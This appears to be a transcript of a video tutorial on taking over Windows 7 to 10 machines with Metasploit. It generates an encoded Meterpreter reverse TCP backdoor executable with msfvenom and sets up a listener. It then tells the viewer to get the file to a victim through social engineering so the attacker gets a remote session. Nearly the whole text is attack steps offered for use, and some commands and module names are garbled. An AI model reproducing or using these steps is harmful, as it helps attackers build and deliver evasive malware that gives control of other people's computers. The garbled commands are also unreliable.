Welcome. In this video we are going to learn how to hack Windows 7, 8, 8.1, 10 using Shikata GANI encoder in Metasploit. This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction, substitution, and dynamic block ordering. Registers are also selected dynamically. Let's open up terminal and type ifconfig. You can see that 192.168.0.7 IP address. Let's create a backdoor using MSF console. Type MSF venom space -h. You can see that basic usage and options. Type MSF venom -p Windows meter reverse TCP lhost equals to 192.168.0.7 lport equals to 444 -f exe -e x64 shikata GANI space I 10 greater than hack.exe. Type ls. You can see that hack.exe file is generated. Let's send this exe file using social engineering technique. Open up MSF console, load the x64/shikata GNAI module into the MSF console. Type use exploit /x86 shikata GNAI. Let's set the payload as reverse TCP. Type set payload Windows meter /reverse_TCP. Type show option. Here you can see that the basic options: lhost localhost address, lport local port. Type set lhost 192.168.0.7. Let's execute it. You can see that listening reverse_TCP handler on 192.168.0.7 444. Once victim clicks on hack.exe file, we get meter session. That's it in this video on hack Windows 7, 8, 8.1, 10 using Shikata GNAI encoder in Metasploit. Thank you for watching this video.